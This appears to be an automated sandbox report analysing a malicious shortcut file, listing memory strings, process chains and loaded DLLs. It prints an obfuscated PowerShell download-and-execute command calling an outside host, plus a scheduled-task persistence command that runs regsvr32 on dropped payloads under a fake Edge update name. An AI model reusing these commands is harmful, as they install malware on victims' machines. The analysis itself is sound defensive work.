Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 0000000E.00000003.1775940842.000001F9E0411000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775675719.000001F9E0CC6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774918323.000001F9E0CC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: fBcMVl6ns6.lnk

ReversingLabs: Detection: 26%

Source: utox_x86_x64.exe	String found in binary or memory: impossible: unknown friend-add error
Source: utox_x86_x64.exe	String found in binary or memory: -h --help Shows this help text.
Source: utox_x86_x64.exe	String found in binary or memory: -h --help Shows this help text.
Source: utox_x86_x64.exe	String found in binary or memory: Search/Add Friends

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat"
Source: C:\Users\Public\ajbs50ul.bat	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe"
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\Public\ajbs50ul.bat	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Windows\System32\rekeywiz.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe"
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
Source: C:\Program Files\Windows Media Player\wmprph.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Windows\System32\rekeywiz.exe	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe"	Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"	Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"	Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
Source: C:\Program Files\Windows Media Player\wmprph.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: quartz.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: qedit.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: dsound.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: ksuser.dll	Jump to behavior
